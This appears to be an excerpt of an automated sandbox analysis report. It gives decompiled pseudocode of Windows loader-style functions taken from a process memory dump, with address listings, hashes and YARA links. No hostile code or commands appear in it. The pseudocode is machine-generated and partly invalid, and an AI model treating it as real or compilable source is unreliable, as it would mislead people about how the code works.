																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x1e3bd5f2
0x1e3bd5f5
0x1e3bd5f5
0x1e3bd5fd
0x1e3bd600
0x1e3bd60a
0x1e3bd60d
0x1e3bd617
0x1e3bd61d
0x1e3bd627
0x1e3bd62e
0x1e3bd911
0x1e3bd913
0x00000000
0x1e3bd919
0x1e3bd919
0x1e3bd919
0x1e3bd634
0x1e3bd634
0x1e3bd634
0x1e3bd634
0x1e3bd640
0x1e3bd8bf
0x00000000
0x1e3bd646
0x1e3bd646
0x1e3bd64d
0x1e3bd652
0x1e40b2fc
0x1e40b2fc
0x1e40b302
0x1e40b33b
0x1e40b341
0x00000000
0x1e40b304
0x1e40b304
0x1e40b319
0x1e40b31e
0x1e40b324
0x1e40b326
0x1e40b332
0x1e40b347
0x1e40b34c
0x1e40b351
0x1e40b35a
0x00000000
0x1e40b328
0x1e40b328
0x00000000
0x1e40b328
0x1e40b326
0x1e3bd658
0x1e3bd658
0x1e3bd65b
0x1e3bd665
0x00000000
0x1e3bd66b
0x1e3bd66b
0x1e3bd66b
0x1e3bd66b
0x1e3bd66d
0x1e3bd672
0x1e3bd67a
0x00000000
0x00000000
0x1e3bd680
0x1e3bd686
0x1e3bd8ce
0x1e3bd8d4
0x1e3bd8dd
0x1e3bd8e0
0x1e3bd68c
0x1e3bd691
0x1e3bd69d
0x1e3bd6a2
0x1e3bd6a7
0x1e3bd6b0
0x1e3bd6b5
0x1e3bd6e0
0x1e3bd6b7
0x1e3bd6b7
0x1e3bd6b9
0x1e3bd6b9
0x1e3bd6bb
0x1e3bd6bd
0x1e3bd6ce
0x1e3bd6d0
0x1e3bd6d2
0x1e40b363
0x1e40b365
0x00000000
0x1e40b36b
0x00000000
0x1e40b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3bd6bf
0x1e3bd6bf
0x1e3bd6e5
0x1e3bd6e7
0x1e3bd6e9
0x1e3bd6ec
0x1e3bd6ec
0x1e3bd6ef
0x1e3bd6f5
0x1e3bd6f9
0x1e3bd6fb
0x1e3bd6fd
0x1e3bd701
0x1e3bd703
0x1e3bd70a
0x1e3bd70a
0x1e3bd701
0x1e3bd710
0x1e3bd710
0x1e3bd6c1
0x1e3bd6c1
0x1e3bd6c6
0x1e40b36d
0x1e40b36f
0x00000000
0x1e40b375
0x1e40b375
0x1e40b375
0x00000000
0x1e40b375
0x00000000
0x1e3bd6cc
0x1e3bd6d8
0x1e3bd6d8
0x1e3bd6d8
0x00000000
0x1e3bd6c6
0x1e3bd6bf
0x00000000
0x1e3bd6da
0x1e3bd6da
0x1e3bd716
0x1e3bd71b
0x1e3bd720
0x1e3bd726
0x1e3bd726
0x1e3bd72d
0x00000000
0x1e3bd733
0x1e3bd739
0x1e3bd742
0x1e3bd750
0x1e3bd758
0x1e3bd764
0x1e3bd776
0x1e3bd77a
0x1e3bd783
0x1e3bd928
0x1e3bd92c
0x1e3bd93d
0x1e3bd944
0x1e3bd94f
0x1e3bd954
0x1e3bd956
0x1e3bd95f
0x1e3bd961
0x1e3bd973
0x1e3bd973
0x1e3bd956
0x1e3bd944
0x1e3bd92c
0x1e3bd78b
0x1e40b394
0x1e3bd791
0x1e3bd798
0x1e40b3a3
0x1e40b3bb
0x1e40b3bb
0x1e3bd7a5
0x1e3bd866
0x1e3bd870
0x1e3bd884
0x1e3bd892
0x1e3bd898
0x1e3bd89e
0x1e3bd8a0
0x1e3bd8a6
0x1e3bd8ac
0x1e3bd8ae
0x1e3bd8b4
0x1e3bd8b4
0x1e3bd8ae
0x1e3bd7a5
0x1e3bd78b
0x1e3bd7b1
0x1e40b3c5
0x1e40b3c5
0x1e3bd7c3
0x1e3bd7ca
0x1e3bd7e5
0x1e3bd7eb
0x1e3bd8eb
0x1e3bd8ed
0x00000000
0x1e3bd8f3
0x1e3bd8f3
0x1e3bd8f3
0x00000000
0x1e3bd8ed
0x1e3bd7cc
0x1e3bd7cc
0x1e3bd7d2
0x00000000
0x1e3bd7d4
0x1e3bd7d4
0x1e3bd7d7
0x1e3bd7df
0x1e40b3d4
0x1e40b3d9
0x1e40b3dc
0x1e40b3dc
0x1e40b3df
0x1e40b3e2
0x1e40b468
0x1e40b46d
0x1e40b46f
0x1e40b46f
0x1e40b475
0x1e3bd8f8
0x1e3bd8f9
0x1e3bd8fd
0x1e40b3e8
0x1e40b3e8
0x1e40b3eb
0x1e40b3ed
0x00000000
0x1e40b3ef
0x1e40b3ef
0x1e40b3f1
0x1e40b3f4
0x1e40b3fe
0x1e40b404
0x1e40b409
0x1e40b40e
0x1e40b410
0x1e40b410
0x1e40b414
0x1e40b414
0x1e40b41b
0x1e40b420
0x1e40b423
0x1e40b425
0x1e40b427
0x1e40b42a
0x1e40b42d
0x1e40b42d
0x1e40b42a
0x1e40b432
0x1e40b436
0x1e40b438
0x1e40b43b
0x1e40b43b
0x1e40b449
0x1e40b44e
0x1e40b454
0x1e40b458
0x1e40b458
0x1e40b45d
0x00000000
0x1e40b45d
0x1e40b3ed
0x00000000
0x00000000
0x00000000
0x1e3bd7df
0x1e3bd7d2
0x1e3bd7ca
0x1e40b37c
0x1e40b37e
0x1e40b385
0x1e40b38a
0x00000000
0x1e40b38a
0x1e3bd742
0x1e3bd7f1
0x1e3bd7f8
0x1e40b49b
0x1e40b49b
0x1e3bd800
0x1e3bd837
0x1e3bd843
0x1e3bd845
0x1e3bd847
0x1e3bd84a
0x1e3bd84b
0x1e3bd84e
0x1e3bd857
0x1e3bd802
0x1e3bd802
0x1e3bd80d
0x00000000
0x1e3bd818
0x1e3bd818
0x1e3bd824
0x1e3bd831
0x1e40b4a5
0x1e40b4ab
0x1e40b4b3
0x1e40b4b8
0x1e40b4bb
0x00000000
0x1e40b4c1
0x1e40b4c1
0x1e40b4c8
0x00000000
0x1e40b4ce
0x1e40b4d4
0x1e40b4e1
0x1e40b4e3
0x1e40b4e5
0x00000000
0x1e40b4eb
0x1e40b4f0
0x1e40b4f2
0x1e3bdac9
0x1e3bdacc
0x1e3bdacf
0x1e3bdad1
0x1e3bdd78
0x1e3bdd78
0x1e3bdcf2
0x00000000
0x1e3bdad7
0x1e3bdad9
0x1e3bdadb
0x00000000
0x00000000
0x1e3bdae1
0x1e3bdae1
0x1e3bdae4
0x1e3bdae6
0x1e40b4f9
0x1e40b4f9
0x1e40b500
0x1e3bdaec
0x1e3bdaec
0x1e3bdaf5
0x1e3bdaf8
0x1e3bdafb
0x1e3bdb03
0x1e3bdb11
0x1e3bdb16
0x1e3bdb19
0x1e3bdb1b
0x1e40b52c
0x1e40b531
0x1e40b534
0x1e3bdb21
0x1e3bdb21
0x1e3bdb24
0x1e3bdcd9
0x1e3bdce2
0x1e3bdce5
0x1e3bdd6a
0x1e3bdd6d
0x00000000
0x1e3bdd73
0x1e40b51a
0x1e40b51c
0x1e40b51f
0x1e40b524
0x00000000
0x1e40b524
0x1e3bdce7
0x1e3bdce7
0x1e3bdce7
0x00000000
0x1e3bdce7
0x00000000
0x1e3bdb2a
0x1e3bdb2c
0x1e3bdb31
0x1e3bdb33
0x1e3bdb36
0x1e3bdb39
0x1e3bdb3b
0x1e3bdb66
0x1e3bdb66
0x1e3bdb3d
0x1e3bdb3d
0x1e3bdb3e
0x1e3bdb46
0x1e3bdb47
0x1e3bdb49
0x1e3bdb4c
0x1e3bdb53
0x1e3bdb55
0x1e3bdb58
0x1e3bdb5a
0x1e40b50a
0x1e40b50f
0x1e40b512
0x1e3bdb60
0x1e3bdb60
0x1e3bdb63
0x1e3bdb63
0x00000000
0x1e3bdb63
0x1e3bdb5a
0x1e3bdb3b
0x1e3bdb24
0x1e3bdb69
0x1e3bdb69
0x1e3bdb6c
0x1e3bdb6f
0x1e3bdb74
0x1e40b557
0x1e40b557
0x1e40b55e
0x1e3bdb7a
0x1e3bdb7c
0x1e3bdb7f
0x1e3bdb82
0x1e3bdb85
0x00000000
0x1e3bdb8b
0x1e3bdb8b
0x1e3bdb8d
0x1e3bdb9b
0x1e3bdb9b
0x1e3bdb9d
0x1e3bdba0
0x1e3bdba2
0x1e3bdba4
0x1e3bdba7
0x1e3bdba9
0x1e3bdbae
0x1e3bdbae
0x1e3bdbb1
0x1e3bdbb4
0x1e3bdbb4
0x1e3bdbb7
0x1e3bdbba
0x1e3bdcd2
0x1e3bdcd4
0x00000000
0x1e3bdbc0
0x1e3bdbc0
0x1e3bdbd2
0x1e3bdbd7
0x1e3bdbda
0x1e3bdbdd
0x1e3bdbdf
0x00000000
0x1e3bdbe5
0x1e3bdbe5
0x1e3bdbee
0x1e3bdbf1
0x1e40b541
0x1e40b544
0x00000000
0x1e40b546
0x1e40b546
0x00000000
0x1e40b546
0x1e3bdbf7
0x1e3bdbf7
0x1e3bdbfd
0x1e3bdbfd
0x1e3bdbff
0x1e3bdc0b
0x1e3bdc15
0x1e3bdc1b
0x1e3bdc1d
0x1e3bdc21
0x1e3bdc21
0x1e3bdc23
0x1e3bdc23
0x1e3bdc26
0x1e3bdc29
0x1e3bdc2b
0x00000000
0x00000000
0x1e3bdc31
0x1e3bdc34
0x1e3bdc36
0x1e3bdcbf
0x1e3bdcbf
0x1e3bdcc2
0x00000000
0x1e3bdc3c
0x1e3bdc41
0x1e3bdc43
0x00000000
0x1e3bdc45
0x1e3bdc45
0x1e3bdc47
0x00000000
0x1e3bdc4d
0x1e3bdc4d
0x1e3bdc50
0x1e3bdc52
0x1e3bdc55
0x1e3bdcfa
0x1e3bdcfe
0x1e3bdd08
0x1e3bdd0a
0x1e3bdd0c
0x00000000
0x1e3bdd12
0x1e3bdd15
0x1e3bdd2d
0x1e3bdd2f
0x1e3bdd32
0x1e3bdd35
0x00000000
0x1e3bdd35
0x1e3bdc5b
0x1e3bdc5b
0x1e3bdc5e
0x1e3bdc61
0x1e3bdc64
0x1e3bdc67
0x1e3bdc67
0x1e3bdc6a
0x1e3bdc6c
0x1e3bdc8e
0x1e3bdc8e
0x1e3bdc91
0x1e3bdc93
0x1e3bdcce
0x1e3bdcce
0x1e3bdc95
0x1e3bdc9c
0x1e3bdc6e
0x1e3bdc72
0x1e3bdc75
0x1e3bdc77
0x1e3bdc79
0x1e40b551
0x1e40b551
0x00000000
0x1e3bdc7f
0x1e3bdc7f
0x1e3bdc81
0x00000000
0x1e3bdc83
0x1e3bdc86
0x1e3bdc88
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3bdc88
0x1e3bdc81
0x1e3bdc79
0x1e3bdc6c
0x1e3bdc55
0x1e3bdc47
0x1e3bdc43
0x00000000
0x1e3bdc36
0x1e3bdc23
0x00000000
0x1e3bdbff
0x1e3bdbf1
0x1e3bdbdf
0x1e3bdb8f
0x1e3bdb92
0x1e3bdb95
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3bdb95
0x1e3bdb8d
0x1e3bdb85
0x1e3bdb74
0x1e3bdc9f
0x1e3bdca2
0x1e3bdcb0
0x1e3bdcb0
0x1e3bdad1
0x1e40b4e5
0x1e40b4c8
0x00000000
0x00000000
0x00000000
0x1e3bd831
0x1e3bd80d
0x00000000
0x1e3bd800
0x1e40b47f
0x1e40b485
0x00000000
0x1e40b485
0x1e3bd665
0x1e3bd652
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 1E3BD898

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 9b017a446c5cbca0d87099d38a728fd4d310f4236d88c6a3c3ac2739f31c19ee
Instruction ID: 990119460426a5bba8234111266570bc9a48462a151cc847a07367bce9c12197
Opcode Fuzzy Hash: 9b017a446c5cbca0d87099d38a728fd4d310f4236d88c6a3c3ac2739f31c19ee
Instruction Fuzzy Hash: BEE1D634A00359CFDB24CF15C998BA9B7B6BF45314F4143AAD80AA7790D734AD85CF52

Uniqueness

Uniqueness Score: -1.00%

Function 1E3D513A, Relevance: 1.8, APIs: 1, Instructions: 258
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E1E3D513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x1e49d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E1E3ED0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E1E3C2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L1E3C4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E1E3EF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E1E3BFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x1e49b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E1E3EB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x1e3d5142
0x1e3d514c
0x1e3d5150
0x1e3d5157
0x1e3d5159
0x1e3d515e
0x1e3d5165
0x1e3d5169
0x1e3d516c
0x1e3d5172
0x1e3d5176
0x1e3d517a
0x1e3d517a
0x1e3d517a
0x1e3d517f
0x1e416d8b
0x1e416d8e
0x1e416d91
0x1e416d95
0x1e416d98
0x1e416d9c
0x1e416da0
0x1e416da3
0x1e416da7
0x1e416e26
0x1e416e26
0x1e416e2a
0x1e3d51f9
0x1e3d51f9
0x1e3d51fe
0x1e416e33
0x1e416e33
0x1e416e39
0x1e416e3d
0x1e416e46
0x1e416e50
0x00000000
0x00000000
0x1e416e52
0x1e416e53
0x1e416e56
0x1e416e5d
0x00000000
0x00000000
0x00000000
0x1e416e5f
0x1e416e67
0x1e416e77
0x1e416e7f
0x1e416e80
0x1e416e88
0x1e416e90
0x1e416e9f
0x1e416ea5
0x1e416ea9
0x1e416eb1
0x1e416ebf
0x00000000
0x00000000
0x1e416ecf
0x1e416ed3
0x00000000
0x00000000
0x1e416edb
0x1e416ede
0x1e416ee1
0x1e416ee8
0x1e416eeb
0x1e416eed
0x1e416ef0
0x1e416ef4
0x1e416ef8
0x1e416efc
0x00000000
0x00000000
0x1e416f0d
0x1e416f11
0x1e416f32
0x1e416f37
0x1e416f3b
0x1e416f3e
0x1e416f41
0x1e416f46
0x00000000
0x00000000
0x1e416f4c
0x1e416f50
0x1e416f50
0x1e416f54
0x1e416f62
0x1e416f65
0x1e416f6d
0x1e416f7b
0x1e416f7b
0x1e416f93
0x1e416f98
0x1e416fa0
0x1e416fa6
0x1e416fb3
0x1e416fb6
0x1e416fbf
0x1e416fc1
0x1e416fd5
0x1e416fda
0x1e416fda
0x1e416fdd
0x1e416fe2
0x1e416fe7
0x1e416feb
0x1e416fef
0x1e416ff3
0x1e3d520c
0x1e3d520c
0x1e3d520f
0x1e3d5215
0x1e3d5234
0x1e3d523a
0x1e3d523a
0x1e3d5244
0x1e3d5245
0x1e3d5246
0x1e3d5251
0x1e3d5251
0x1e416f13
0x1e416f17
0x1e416f17
0x1e416f18
0x1e416f1b
0x1e416f1f
0x1e416f23
0x00000000
0x1e416f28
0x1e3d5204
0x1e3d5204
0x1e3d5208
0x00000000
0x1e3d5208
0x1e3d5185
0x1e3d5188
0x1e3d518a
0x1e3d518e
0x1e3d5195
0x1e416db1
0x1e416db5
0x1e416db9
0x1e3d519b
0x1e3d519b
0x1e3d519e
0x1e3d51a7
0x1e3d51a9
0x1e3d51a9
0x1e3d51b5
0x1e3d51b8
0x1e3d51bb
0x1e3d51be
0x1e3d51c1
0x1e3d51c5
0x1e3d51c9
0x1e3d51cd
0x1e3d51cd
0x1e3d51d8
0x1e3d51dc
0x1e3d51e0
0x1e416dcc
0x1e416dd0
0x1e416dd5
0x1e416ddd
0x1e416de1
0x1e416de1
0x1e416de5
0x1e416deb
0x1e416df1
0x1e416df7
0x1e416dfd
0x1e416e01
0x1e416e05
0x1e416e09
0x1e416e0d
0x1e416e11
0x1e416e11
0x1e3d51eb
0x1e416e1a
0x1e416e1f
0x1e416e21
0x1e416e23
0x00000000
0x1e3d51f1
0x1e3d51f1
0x00000000
0x1e3d51f1

APIs

RtlDebugPrintTimes.NTDLL ref: 1E3D5234

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 3509df80adca55a30b35ba63c74ade58633d5ac20034f66aacc7174d5bff0a20
Instruction ID: 787b5fa407a23595b4c1eb87dae369e5c85f6cef91dba8b96b92415ebb87dde4
Opcode Fuzzy Hash: 3509df80adca55a30b35ba63c74ade58633d5ac20034f66aacc7174d5bff0a20
Instruction Fuzzy Hash: 92C111755083819FD754CF28C590A5AFBF2BF88304F148AAEF8998B392D771E945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 1E3D03E2, Relevance: 1.8, APIs: 1, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E1E3D03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x1e49d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E1E3D0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E1E3EB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E1E3BB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1e497c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E1E3C7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E1E3C7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E1E427016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E1E3E9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E1E4269A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1e497c04 != 0) {
						_t118 = _v12;
						_t120 = E1E42A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1e497bd8;
						if( *0x1e497bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E1E3E95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E1E3E99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E1E423540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E1E3AB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E1E3EAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1e498474 - 3;
										if( *0x1e498474 != 3) {
											 *0x1e4979dc =  *0x1e4979dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E1E3C7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E1E3C7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
